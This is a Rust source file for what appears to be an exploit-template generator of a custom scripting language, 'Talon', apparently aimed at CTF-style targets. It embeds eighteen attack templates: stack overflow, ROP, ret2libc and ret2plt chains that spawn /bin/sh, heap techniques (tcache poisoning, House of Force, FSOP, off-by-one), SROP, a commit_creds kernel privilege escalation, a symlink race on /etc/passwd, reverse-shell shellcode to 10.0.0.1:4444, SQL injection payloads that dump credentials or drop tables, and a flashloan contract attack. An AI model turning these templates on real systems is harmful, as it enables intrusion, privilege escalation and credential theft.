use std::collections::HashMap;
use std::fs;

pub struct TemplateGenerator {
    templates: HashMap<String, String>,
}

impl TemplateGenerator {
    pub fn new() -> Self {
        let mut gen = TemplateGenerator {
            templates: HashMap::new(),
        };
        gen.load_builtin_templates();
        gen
    }

    fn load_builtin_templates(&mut self) {
        self.templates.insert(
            "buffer-overflow".to_string(),
            BUFFER_OVERFLOW_TEMPLATE.to_string(),
        );
        self.templates
            .insert("rop".to_string(), ROP_TEMPLATE.to_string());
        self.templates.insert(
            "format-string".to_string(),
            FORMAT_STRING_TEMPLATE.to_string(),
        );
        self.templates
            .insert("heap".to_string(), HEAP_TEMPLATE.to_string());
        self.templates
            .insert("kernel".to_string(), KERNEL_TEMPLATE.to_string());
        self.templates
            .insert("ret2libc".to_string(), RET2LIBC_TEMPLATE.to_string());
        self.templates
            .insert("use-after-free".to_string(), UAF_TEMPLATE.to_string());
        self.templates.insert(
            "race-condition".to_string(),
            RACE_CONDITION_TEMPLATE.to_string(),
        );
        self.templates
            .insert("shellcode".to_string(), SHELLCODE_TEMPLATE.to_string());
        self.templates
            .insert("web-sqli".to_string(), SQLI_TEMPLATE.to_string());
        self.templates.insert(
            "smart-contract".to_string(),
            SMART_CONTRACT_TEMPLATE.to_string(),
        );
        self.templates
            .insert("basic".to_string(), BASIC_TEMPLATE.to_string());
        self.templates
            .insert("ret2csu".to_string(), RET2CSU_TEMPLATE.to_string());
        self.templates
            .insert("ret2plt".to_string(), RET2PLT_TEMPLATE.to_string());
        self.templates
            .insert("fsop".to_string(), FSOP_TEMPLATE.to_string());
        self.templates
            .insert("srop".to_string(), SROP_TEMPLATE.to_string());
        self.templates.insert(
            "house-of-force".to_string(),
            HOUSE_OF_FORCE_TEMPLATE.to_string(),
        );
        self.templates
            .insert("off-by-one".to_string(), OFF_BY_ONE_TEMPLATE.to_string());
    }

    pub fn list_templates(&self) -> Vec<String> {
        let mut templates: Vec<String> = self.templates.keys().cloned().collect();
        templates.sort();
        templates
    }

    pub fn generate(&self, template_type: &str, name: &str) -> Result<String, String> {
        let template = self
            .templates
            .get(template_type)
            .ok_or_else(|| format!("Template '{}' not found", template_type))?;

        let content = template.replace("{{NAME}}", name);
        let filename = format!("{}.tal", name);

        fs::write(&filename, &content).map_err(|e| format!("Failed to write file: {}", e))?;

        Ok(filename)
    }

    pub fn get_template_description(&self, template_type: &str) -> Option<&'static str> {
        match template_type {
            "buffer-overflow" => Some("Classic stack buffer overflow exploitation"),
            "rop" => Some("Return-Oriented Programming chain builder"),
            "format-string" => Some("Format string vulnerability exploitation"),
            "heap" => Some("Heap exploitation (tcache, fastbin, unsorted bin)"),
            "kernel" => Some("Linux kernel privilege escalation"),
            "ret2libc" => Some("Return-to-libc attack bypassing NX"),
            "use-after-free" => Some("Use-after-free heap exploitation"),
            "race-condition" => Some("Race condition / TOCTOU exploitation"),
            "shellcode" => Some("Custom shellcode development and encoding"),
            "web-sqli" => Some("SQL injection exploitation"),
            "smart-contract" => Some("Solidity smart contract auditing"),
            "basic" => Some("Basic Talon script structure"),
            "ret2csu" => Some("Return-to-CSU gadget exploitation"),
            "ret2plt" => Some("Return-to-PLT for calling libc functions"),
            "fsop" => Some("File Stream Oriented Programming (FSOP)"),
            "srop" => Some("Sigreturn-Oriented Programming (SROP)"),
            "house-of-force" => Some("House of Force heap exploitation"),
            "off-by-one" => Some("Off-by-one overflow exploitation"),
            _ => None,
        }
    }
}

const BASIC_TEMPLATE: &str = r#"// {{NAME}} - Talon Script
// Generated by talon new basic

// Connect to target
connect to "target.com" on port 1337

// Receive banner
let banner = recv 1024
print "Banner: " + banner

// Send payload
let payload = "A" * 100
send payload

// Get response
let response = recv 1024
print "Response: " + response

// Clean exit
exit
"#;

const BUFFER_OVERFLOW_TEMPLATE: &str = r#"// {{NAME}} - Buffer Overflow Exploit
// Generated by talon new buffer-overflow

// Binary analysis
analyze binary "target_binary"
find vulnerability type=buffer_overflow

// Calculate offset
let pattern = cyclic(500)
let offset = cyclic_find(pattern, crash_addr)

// Build ROP chain
let rop = []
rop = rop + p64(pop_rdi_gadget)
rop = rop + p64(bin_sh_addr)
rop = rop + p64(system_addr)

// Construct payload
let padding = "A" * offset
let payload = padding + rop

// Execute exploit
connect to "target.com" on port 9999
send payload
interactive
"#;

const ROP_TEMPLATE: &str = r#"// {{NAME}} - ROP Chain Exploit
// Generated by talon new rop

// Find ROP gadgets
resolve rop chain in "binary"
let pop_rdi = find_rop_gadget("binary", "pop rdi; ret")
let pop_rsi = find_rop_gadget("binary", "pop rsi; ret")
let pop_rdx = find_rop_gadget("binary", "pop rdx; ret")
let ret = find_rop_gadget("binary", "ret")

// Leak libc base
let puts_plt = elf_symbol("binary", "puts", "plt")
let puts_got = elf_symbol("binary", "puts", "got")

// Stage 1: Leak
let leak_chain = [
    p64(pop_rdi),
    p64(puts_got),
    p64(puts_plt),
    p64(main_addr)
]

connect to "target.com" on port 1337
send cyclic(offset) + leak_chain
let leak = u64(recv(8))
let libc_base = leak - libc_puts_offset

// Stage 2: Shell
let system = libc_base + libc_system_offset
let binsh = libc_base + libc_binsh_offset

let shell_chain = [
    p64(pop_rdi),
    p64(binsh),
    p64(ret),
    p64(system)
]

send cyclic(offset) + shell_chain
interactive
"#;

const FORMAT_STRING_TEMPLATE: &str = r#"// {{NAME}} - Format String Exploit
// Generated by talon new format-string

analyze binary "vulnerable"

// Find format string offset
let offset = find_format_offset("vulnerable", 20)

// Arbitrary write using format string
let target_addr = 0x601040  // GOT entry
let shellcode_addr = 0x7ffff7a00000

// Build format string payload
let payload = p64(target_addr)
payload = payload + p64(target_addr + 2)
payload = payload + "%{}c%{}$hn".format(shellcode_addr & 0xffff, offset)
payload = payload + "%{}c%{}$hn".format((shellcode_addr >> 16) & 0xffff, offset + 1)

connect to "target.com" on port 9999
send payload
interactive
"#;

const HEAP_TEMPLATE: &str = r#"// {{NAME}} - Heap Exploitation
// Generated by talon new heap

// Heap feng shui
heap_groom target: 0xdeadbeef
    spray_size: 0x100
    spray_count: 20
    allocate_size: 0x100
end

// Tcache poisoning
let fake_chunk = p64(0) + p64(0x111)
fake_chunk = fake_chunk + p64(target_addr)

// Trigger use-after-free
free_chunk(victim_chunk)
allocate_chunk(0x100, fake_chunk)

// Overwrite target
allocate_chunk(0x100, shellcode)

// Trigger execution
call_function_pointer(target_addr)
"#;

const KERNEL_TEMPLATE: &str = r#"// {{NAME}} - Kernel Privilege Escalation
// Generated by talon new kernel

kernel_exploit
    leak_method: "auto"
    spray_target: "physmap"
    escalation: "root"
end

// Manual kernel exploit
let kbase = leak_kernel_base()
let commit_creds = kbase + 0x9c8e0
let prepare_kernel_cred = kbase + 0x9cce0

// Build ROP chain
let krop = []
krop = krop + p64(pop_rdi_ret)
krop = krop + p64(0)
krop = krop + p64(prepare_kernel_cred)
krop = krop + p64(pop_rcx_ret)
krop = krop + p64(0)
krop = krop + p64(mov_rdi_rax_ret)
krop = krop + p64(commit_creds)
krop = krop + p64(swapgs_ret)
krop = krop + p64(iretq)
krop = krop + p64(shell_addr)

// Trigger vulnerability
trigger_kernel_vuln(krop)
"#;

const RET2LIBC_TEMPLATE: &str = r#"// {{NAME}} - Return to libc
// Generated by talon new ret2libc

analyze binary "target"

// Leak libc address
let puts_plt = elf_symbol("target", "puts", "plt")
let puts_got = elf_symbol("target", "puts", "got")
let main = elf_symbol("target", "main", "symbol")

connect to "target.com" on port 1337
let stage1 = cyclic(offset) + p64(pop_rdi) + p64(puts_got) + p64(puts_plt) + p64(main)
send stage1

let leak = u64(recv(8))
let libc_base = leak - 0x80e50  // puts offset in libc

// Calculate addresses
let system = libc_base + 0x50d60
let binsh = libc_base + 0x1b3e1a

// Return to system("/bin/sh")
let stage2 = cyclic(offset) + p64(pop_rdi) + p64(binsh) + p64(system)
send stage2
interactive
"#;

const UAF_TEMPLATE: &str = r#"// {{NAME}} - Use After Free
// Generated by talon new use-after-free

// Allocate victim object
allocate_object(0, 0x100)

// Free the object (creates dangling pointer)
free_object(0)

// Spray heap with controlled data
for i in 0..20
    let fake_vtable = p64(win_function)
    allocate_object(i + 1, fake_vtable)
end

// Trigger use of freed object (should hit our fake vtable)
use_object(0)
"#;

const RACE_CONDITION_TEMPLATE: &str = r#"// {{NAME}} - Race Condition Exploit
// Generated by talon new race-condition

// TOCTOU (Time of Check, Time of Use)
parallel
    // Thread 1: Constantly swap symlink
    for i in 0..1000000
        symlink("/tmp/safe", "/tmp/race")
        symlink("/etc/passwd", "/tmp/race")
    end
end

parallel
    // Thread 2: Trigger vulnerable operation
    for i in 0..1000
        trigger_check_operation("/tmp/race")
    end
end
"#;

const SHELLCODE_TEMPLATE: &str = r#"// {{NAME}} - Shellcode Development
// Generated by talon new shellcode

// Generate shellcode
let sc = generate_shellcode(reverse_shell, lhost="10.0.0.1", lport=4444)

// Encode shellcode (bypass filters)
let encoded = encode_alphanumeric(sc)

// Alternative: Custom shellcode
assemble syscall "
    xor rdi, rdi
    push rdi
    push 0x68732f2f
    push 0x6e69622f
    mov rdi, rsp
    xor rsi, rsi
    xor rdx, rdx
    mov rax, 59
    syscall
" for linux

let custom_sc = assemble_result

// Send shellcode
connect to "target.com" on port 1337
send encoded
interactive
"#;

const SQLI_TEMPLATE: &str = r#"// {{NAME}} - SQL Injection
// Generated by talon new web-sqli

// Detect SQL injection
let payloads = ["'", "' OR '1'='1", "' UNION SELECT NULL--", "'; DROP TABLE users--"]

for payload in payloads
    let url = "http://target.com/login?user=" + payload
    fetch url
    if response contains "error" or "SQL"
        print "Potential SQLi: " + payload
    end
end

// Extract database
let union_payload = "' UNION SELECT table_name,NULL FROM information_schema.tables--"
fetch "http://target.com/search?q=" + union_payload

// Dump credentials
let dump_payload = "' UNION SELECT username,password FROM users--"
fetch "http://target.com/search?q=" + dump_payload
"#;

const SMART_CONTRACT_TEMPLATE: &str = r#"// {{NAME}} - Smart Contract Audit
// Generated by talon new smart-contract

audit solidity "contract.sol"
    detect: ["reentrancy", "integer_overflow", "delegatecall"]
    auto_exploit: true
end

// Manual reentrancy exploit
parse abi json "VulnerableBank.json"
call ethereum node "http://localhost:8545" with data "withdraw(1000000)"

// Flashloan attack
flashloan attack from "UniswapV2"
    borrow: 1000000
    target: "0x1234567890abcdef"
    profit: 50000
end
"#;

const RET2CSU_TEMPLATE: &str = r#"// {{NAME}} - ret2csu Exploit
// Generated by talon new ret2csu

// ret2csu: Universal ROP gadget in __libc_csu_init
// Useful when no good gadgets available but libc is present

analyze binary "./target"
let base = leak_pie_base()

// Locate __libc_csu_init gadgets
let csu_init = base + 0x1234  // Adjust offset
let csu_gadget1 = csu_init + 0x5a  // pop rbx; pop rbp; pop r12; pop r13; pop r14; pop r15; ret
let csu_gadget2 = csu_init + 0x40  // mov rdx, r15; mov rsi, r14; mov edi, r13d; call [r12+rbx*8]

// Build ROP chain using ret2csu
let rop_chain = [
    csu_gadget1,
    0,                    // rbx = 0
    1,                    // rbp = 1 (loop counter)
    got_func,             // r12 = target function pointer
    arg1,                 // r13 = first argument (edi)
    arg2,                 // r14 = second argument (rsi)
    arg3,                 // r15 = third argument (rdx)
    csu_gadget2,          // Call gadget
    0, 0, 0, 0, 0, 0, 0   // Padding for stack alignment
]

// Build payload
let padding = "A" * 72
let payload = [...padding | bytes, ...rop_chain | bytes]

connect to "target.com" on port 1337
send payload
let flag = recv 1024
print "Flag: " + flag
"#;

const RET2PLT_TEMPLATE: &str = r#"// {{NAME}} - Return-to-PLT Exploitation
// Generated by talon new ret2plt

// ret2plt: Call libc functions via PLT without libc leak
// Useful when ASLR enabled but no PIE, or partial RELRO

analyze binary "./target"
let base = leak_pie_base()

// Locate PLT entries (no randomization in PIE-disabled binaries)
let plt_puts = base + 0x1040       // puts@PLT
let plt_gets = base + 0x1050       // gets@PLT
let plt_system = base + 0x1060     // system@PLT (if available)
let plt_printf = base + 0x1070     // printf@PLT

// Find useful gadgets
let pop_rdi = base + 0x1234        // pop rdi; ret
let pop_rsi_r15 = base + 0x5678    // pop rsi; pop r15; ret
let ret = base + 0x9abc            // ret (stack alignment)

// Data section for writable strings
let data_section = base + 0x4000
let binsh_addr = data_section + 0x100

// Stage 1: Write "/bin/sh" to data section using gets
let stage1_rop = [
    pop_rdi,
    binsh_addr,              // rdi = destination address
    plt_gets,                // Call gets to read "/bin/sh"
    pop_rdi,
    binsh_addr,              // rdi = "/bin/sh" address
    plt_system               // Call system("/bin/sh")
]

// Alternative: Use printf for arbitrary write
let stage2_rop = [
    pop_rdi,
    format_string_addr,      // Format string location
    pop_rsi_r15,
    target_addr,             // Value to write
    0x0,                     // r15 padding
    plt_printf               // Execute write via format string
]

// Build payload
let padding = "A" * 88
let payload = [...padding | bytes, ...stage1_rop | bytes]

// Connect and exploit
connect to "target.com" on port 1337
send payload
send "/bin/sh\n"             // Input for gets call
let shell = recv 1024
print "Shell obtained: " + shell
"#;

const FSOP_TEMPLATE: &str = r#"// {{NAME}} - File Stream Oriented Programming (FSOP)
// Generated by talon new fsop

// FSOP: Exploit FILE structure to hijack control flow
// Targets _IO_list_all, vtable pointers in FILE streams

analyze binary "./target"
heap_exploit "./target"
    technique: fsop_attack
    glibc_version: "2.35"
end

// Leak libc and heap addresses
let libc_leak = recv 8 | u64
let libc_base = libc_leak - 0x1ec980  // Adjust offset
let heap_leak = recv 8 | u64

// Locate critical addresses
let io_list_all = libc_base + 0x1ed5a0
let system = libc_base + 0x50d60
let fake_vtable = heap_leak + 0x200

// Craft fake FILE structure
let fake_file = [
    0x0,                              // _flags
    0x0,                              // _IO_read_ptr
    0x0,                              // _IO_read_end
    0x0,                              // _IO_read_base
    0x0,                              // _IO_write_base
    0x0,                              // _IO_write_ptr
    0x0,                              // _IO_write_end
    0x0,                              // _IO_buf_base
    0x0,                              // _IO_buf_end
    bin_sh_addr,                      // _IO_save_base (arg for system)
    0x0,                              // _IO_backup_base
    0x0,                              // _IO_save_end
    0x0,                              // _markers
    0x0,                              // _chain
    0x0,                              // _fileno
    0x0,                              // _flags2
    fake_vtable                       // vtable pointer
]

// Overwrite _IO_list_all
send fake_file | bytes
let response = recv 1024
print "Shell: " + response
"#;

const SROP_TEMPLATE: &str = r#"// {{NAME}} - Sigreturn-Oriented Programming (SROP)
// Generated by talon new srop

// SROP: Abuse sigreturn syscall to set all registers at once
// Useful when very few gadgets available

analyze binary "./target"
let base = leak_pie_base()

// Find sigreturn gadget (syscall; ret where rax=15)
let syscall_ret = base + 0xabcd  // Adjust offset
let pop_rax = base + 0x1234      // pop rax; ret

// Build sigreturn frame (arch-dependent)
let sigframe = [
    0x0,                    // uc_flags
    0x0,                    // uc_link
    0x0, 0x0, 0x0,          // uc_stack (ss_sp, ss_flags, ss_size)
    0x0,                    // r8
    0x0,                    // r9
    0x0,                    // r10
    0x0,                    // r11
    0x0,                    // r12
    0x0,                    // r13
    0x0,                    // r14
    0x0,                    // r15
    bin_sh_addr,            // rdi (arg1 for execve)
    0x0,                    // rsi (arg2)
    0x0,                    // rdx (arg3)
    0x0,                    // rcx
    0x0,                    // rbx
    0x0,                    // rbp
    59,                     // rax (execve syscall number)
    syscall_ret,            // rip
    0x33,                   // cs
    0x0,                    // eflags
    stack_addr,             // rsp
    0x2b                    // ss
]

// Build ROP chain
let rop_chain = [
    pop_rax,
    15,                     // SYS_rt_sigreturn
    syscall_ret,
    ...sigframe
]

let padding = "A" * 128
let payload = [...padding | bytes, ...rop_chain | bytes]

connect to "target.com" on port 1337
send payload
let shell = recv 1024
print "Shell obtained: " + shell
"#;

const HOUSE_OF_FORCE_TEMPLATE: &str = r#"// {{NAME}} - House of Force Heap Exploit
// Generated by talon new house-of-force

// House of Force: Overflow top chunk size to allocate anywhere in memory
// Requires ability to overflow top chunk size field

analyze binary "./target"
heap_exploit "./target"
    technique: house_of_force
    target: __malloc_hook
    overwrite_with: system
    glibc_version: "2.23"
end

// Step 1: Overflow top chunk size
let evil_size = 0xffffffffffffffff
let overflow_payload = "A" * 88 + p64(evil_size)
send overflow_payload

// Step 2: Calculate allocation size to reach target
let target_addr = __malloc_hook_addr  // Address to overwrite
let top_chunk_addr = heap_base + 0x1000
let alloc_size = target_addr - top_chunk_addr - 0x10

// Step 3: Allocate to target address
malloc alloc_size

// Step 4: Allocate again and overwrite __malloc_hook
let hook_payload = p64(system_addr)
malloc 24
send hook_payload

// Step 5: Trigger __malloc_hook with "/bin/sh"
let trigger = "/bin/sh\x00"
malloc 16
send trigger

// Get shell
let shell = recv 1024
print "Shell: " + shell
"#;

const OFF_BY_ONE_TEMPLATE: &str = r#"// {{NAME}} - Off-by-One Overflow Exploit
// Generated by talon new off-by-one

// Off-by-one: Exploit single-byte overflow to manipulate heap metadata
// Common in string operations (strcpy, strncpy, etc.)

analyze binary "./target"
heap_exploit "./target"
    technique: off_by_one_overflow
    glibc_version: "2.31"
end

// Step 1: Setup heap layout
// Allocate chunks in specific order for overlap
malloc 0x100  // chunk A
malloc 0x100  // chunk B
malloc 0x100  // chunk C (prevent consolidation)

// Step 2: Free chunk A to create a fake chunk
free chunk_a

// Step 3: Off-by-one overflow to corrupt chunk B size
// Change last byte of size field from 0x110 to 0x100
let overflow_payload = "A" * 0x100 + "\x00"
send overflow_payload

// Step 4: Allocate overlapping chunks
malloc 0x100  // Reallocate chunk A
malloc 0xd0   // This overlaps with chunk B

// Step 5: Exploit overlap for arbitrary write
let fake_chunk = [
    0x0,
    0x91,                  // Fake chunk size
    target_addr,           // fd pointer
    0x0                    // bk pointer
]
send fake_chunk | bytes

// Step 6: Trigger write primitive
free chunk_b
malloc 0x80

// Overwrite target with controlled data
let payload = p64(system_addr)
send payload

let result = recv 1024
print "Exploit result: " + result
"#;
